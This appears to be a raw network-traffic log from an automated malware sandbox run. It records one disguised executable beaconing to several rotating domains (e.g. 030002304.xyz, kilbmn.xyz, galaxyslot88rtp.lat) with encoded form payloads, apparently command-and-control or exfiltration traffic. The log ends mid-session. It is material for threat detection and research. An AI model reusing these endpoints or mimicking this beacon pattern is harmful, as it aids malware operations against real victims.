                                                                  Oct 7, 2024 10:41:35.253551006 CEST1.1.1.1192.168.2.100x4fbeNo error (0)platinumkitchens.info3.33.130.190A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:41:35.253551006 CEST1.1.1.1192.168.2.100x4fbeNo error (0)platinumkitchens.info15.197.148.33A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49976 | 76.223.105.230 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 10:38:23.582180977 CEST | 525 | OUT | GET /cjvv/?EZ2lo=4S8XY8l3MvvMOMyL3KrDz8kPPAGqnGng5tYYPWDdvWcwX33CgHNrDDjfFme/uWZ2yYnPkPJRTtnUR7GmwOpWBkY/43NiHjgDg3aX97mZZ8znKIfN0Q==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.wearenotgoingback.info
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
Oct 7, 2024 10:38:24.034672976 CEST | 467 | IN | HTTP/1.1 301 Moved Permanently
                                                                  location: https://wearenotgoingback.info/cjvv/?EZ2lo=4S8XY8l3MvvMOMyL3KrDz8kPPAGqnGng5tYYPWDdvWcwX33CgHNrDDjfFme/uWZ2yYnPkPJRTtnUR7GmwOpWBkY/43NiHjgDg3aX97mZZ8znKIfN0Q==&7NP=7FXXUPl
                                                                  vary: Accept-Encoding
                                                                  server: DPS/2.0.0+sha-227ca78
                                                                  x-version: 227ca78
                                                                  x-siteid: us-east-1
                                                                  set-cookie: dps_site_id=us-east-1; path=/
                                                                  date: Mon, 07 Oct 2024 08:38:23 GMT
                                                                  keep-alive: timeout=5
                                                                  transfer-encoding: chunked
                                                                  connection: close
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49977 | 65.21.196.90 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 10:38:39.586091995 CEST | 782 | OUT | POST /u38h/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.030002304.xyz
                                                                  Origin: http://www.030002304.xyz
                                                                  Referer: http://www.030002304.xyz/u38h/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
Oct 7, 2024 10:38:40.233946085 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Mon, 07 Oct 2024 08:38:40 GMT
                                                                  vary: User-Agent
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49978 | 65.21.196.90 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 10:38:42.136537075 CEST | 806 | OUT | POST /u38h/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.030002304.xyz
                                                                  Origin: http://www.030002304.xyz
                                                                  Referer: http://www.030002304.xyz/u38h/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
Oct 7, 2024 10:38:42.783889055 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Mon, 07 Oct 2024 08:38:42 GMT
                                                                  vary: User-Agent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49979 | 65.21.196.90 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 10:38:44.680650949 CEST | 1819 | OUT | POST /u38h/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.030002304.xyz
                                                                  Origin: http://www.030002304.xyz
                                                                  Referer: http://www.030002304.xyz/u38h/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
Oct 7, 2024 10:38:45.357409954 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Mon, 07 Oct 2024 08:38:45 GMT
                                                                  vary: User-Agent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49980 | 65.21.196.90 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 10:38:47.224376917 CEST | 516 | OUT | GET /u38h/?EZ2lo=iaxEuHPh9M0PkCehiVmYq99vb8GYcF42nF8/pgvOtFqWiDn4lMrJ/WO5nlbDSyDBFBFfwqZzhOOdUgIoiT3LOtzwEygyB6NUSlIKo/1Br+QrM4rsiQ==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.030002304.xyz
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
Oct 7, 2024 10:38:48.458664894 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Mon, 07 Oct 2024 08:38:47 GMT
                                                                  vary: User-Agent
Oct 7, 2024 10:38:48.459136963 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Mon, 07 Oct 2024 08:38:47 GMT
                                                                  vary: User-Agent
Oct 7, 2024 10:38:48.829121113 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Mon, 07 Oct 2024 08:38:47 GMT
                                                                  vary: User-Agent
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                  5    192.168.2.10    49981    162.0.238.246    80    6332    C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                  Oct 7, 2024 10:38:53.661032915 CEST    773    OUT    POST /a8og/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.kilbmn.xyz
                                                                  Origin: http://www.kilbmn.xyz
                                                                  Referer: http://www.kilbmn.xyz/a8og/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=317J5C6QVzXA7tFJjjKJMxbHmUdL7I8PAJ72MgStamrh6gg77dk8j32IITnpflwLGxg9B82HYdEkMsEDp9PCcw1DjivM//fCInjNM1YmL/5j56tshwMbzAiSSYJJSd87H92N1XEdIgicOOFzXrzWEZeEUEhETIkN1ezoTxPrYN0n21bHsrb1T6Q4+1d7
                                                                  Oct 7, 2024 10:38:54.248193979 CEST    595    IN    HTTP/1.1 404 Not Found
                                                                  Date: Mon, 07 Oct 2024 08:38:54 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 389
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                  6    192.168.2.10    49982    162.0.238.246    80    6332    C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                  Oct 7, 2024 10:38:56.252007961 CEST    797    OUT    POST /a8og/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.kilbmn.xyz
                                                                  Origin: http://www.kilbmn.xyz
                                                                  Referer: http://www.kilbmn.xyz/a8og/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=317J5C6QVzXA5M1JvgSJExbE6kdLxo8LAJH2Mg69ZQbh0hQ76fA8g32IaznWQFwQGx9KB5OHYdAkMtUDpKiUdg1B4SvOiPfCInjNM1NLL7Vj+LdshRMYyAiRFoJJEt8/H92k1WI7Il+cOKBzW/fXKZeKbkgKCYxz9vnQTiTfB/Y/xU6A966iANM2wzoRDZ+dNGHIJkvW4+iGHsSL5g==
                                                                  Oct 7, 2024 10:38:57.858441114 CEST    595    IN    HTTP/1.1 404 Not Found
                                                                  Date: Mon, 07 Oct 2024 08:38:56 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 389
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                  Oct 7, 2024 10:38:57.859232903 CEST    595    IN    HTTP/1.1 404 Not Found
                                                                  Date: Mon, 07 Oct 2024 08:38:56 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 389
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                  Oct 7, 2024 10:38:57.859998941 CEST    595    IN    HTTP/1.1 404 Not Found
                                                                  Date: Mon, 07 Oct 2024 08:38:56 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 389
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                  7    192.168.2.10    49983    162.0.238.246    80    6332    C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                  Oct 7, 2024 10:38:58.790831089 CEST    1810    OUT    POST /a8og/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.kilbmn.xyz
                                                                  Origin: http://www.kilbmn.xyz
                                                                  Referer: http://www.kilbmn.xyz/a8og/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo= [TRUNCATED]
                                                                  Oct 7, 2024 10:38:59.405152082 CEST    595    IN    HTTP/1.1 404 Not Found
                                                                  Date: Mon, 07 Oct 2024 08:38:59 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 389
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                  8    192.168.2.10    49984    162.0.238.246    80    6332    C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                  Oct 7, 2024 10:39:01.684482098 CEST    513    OUT    GET /a8og/?EZ2lo=63Tp62CKGmWe748Q5xeLHwHqlS9/zq85FZX5ThSUZXnn1SRB3dZnoH27TzC6blggGQlMUKSAP7YLOcUQh9GTRQVuzTmijcvuIWv8RUIdN7d1j+xO0w==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.kilbmn.xyz
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:39:02.300024033 CEST    610    IN    HTTP/1.1 404 Not Found
                                                                  Date: Mon, 07 Oct 2024 08:39:02 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 389
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                  9    192.168.2.10    49985    46.17.172.49    80    6332    C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                  Oct 7, 2024 10:39:09.179605007 CEST    800    OUT    POST /zkan/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.galaxyslot88rtp.lat
                                                                  Origin: http://www.galaxyslot88rtp.lat
                                                                  Referer: http://www.galaxyslot88rtp.lat/zkan/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=3boz0FwZobhA6ZLI+KgGi2SVBEVeanZ++BuwqBiuLCrLQq6Tj02b2RdNBw4Jsi4zMYNqC5jdZaEifU/hQZukBuTEHRkD/91gkI2gd5RBgZ0RkoWGBZ/S8TjVCcLOWcjincPNJccZoD/ZRisqemcB44m+rA3DQqSKSrDP+ZhtcMk7cAwwfR2OYDQjfuRV
                                                                  Oct 7, 2024 10:39:10.092828035 CEST    1236    IN    HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 07 Oct 2024 08:39:09 GMT
                                                                  server: LiteSpeed
                                                                  platform: hostinger
                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                  x-xss-protection: 1; mode=block
                                                                  x-content-type-options: nosniff
                                                                  vary: User-Agent
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                  Oct 7, 2024 10:39:10.092852116 CEST | 431 | IN
                                                                  Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  10 | 192.168.2.10 | 49986 | 46.17.172.49 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:39:11.728627920 CEST | 824 | OUT | POST /zkan/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.galaxyslot88rtp.lat
                                                                  Origin: http://www.galaxyslot88rtp.lat
                                                                  Referer: http://www.galaxyslot88rtp.lat/zkan/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=3boz0FwZobhA747I4rgGq2SKOkVeMXY1+BSwqAm+LxPLQIiTgxab3RdNJQ4Mxy59MZwZC5vdZbgifVPhQq2lD+TGcBkB791gkI2gd5EcgZMRnbOGOandijjUHsLOScjmncOgJZ8joBHZRnIqf00Cx4mkvA2mUaTHbJ3nwa5kMNEufhR3OAXZL0MtRok/SJV3Cl/YxhcEheA+2/6XlQ==
                                                                  Oct 7, 2024 10:39:12.676270008 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 07 Oct 2024 08:39:12 GMT
                                                                  server: LiteSpeed
                                                                  platform: hostinger
                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                  x-xss-protection: 1; mode=block
                                                                  x-content-type-options: nosniff
                                                                  vary: User-Agent
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                  Oct 7, 2024 10:39:12.676295996 CEST | 431 | IN
                                                                  Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  11 | 192.168.2.10 | 49987 | 46.17.172.49 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:39:14.311151028 CEST | 1837 | OUT | POST /zkan/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.galaxyslot88rtp.lat
                                                                  Origin: http://www.galaxyslot88rtp.lat
                                                                  Referer: http://www.galaxyslot88rtp.lat/zkan/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:39:15.263647079 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 07 Oct 2024 08:39:15 GMT
                                                                  server: LiteSpeed
                                                                  platform: hostinger
                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                  x-xss-protection: 1; mode=block
                                                                  x-content-type-options: nosniff
                                                                  vary: User-Agent
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                  Oct 7, 2024 10:39:15.263684034 CEST | 431 | IN
                                                                  Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  12 | 192.168.2.10 | 49988 | 46.17.172.49 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
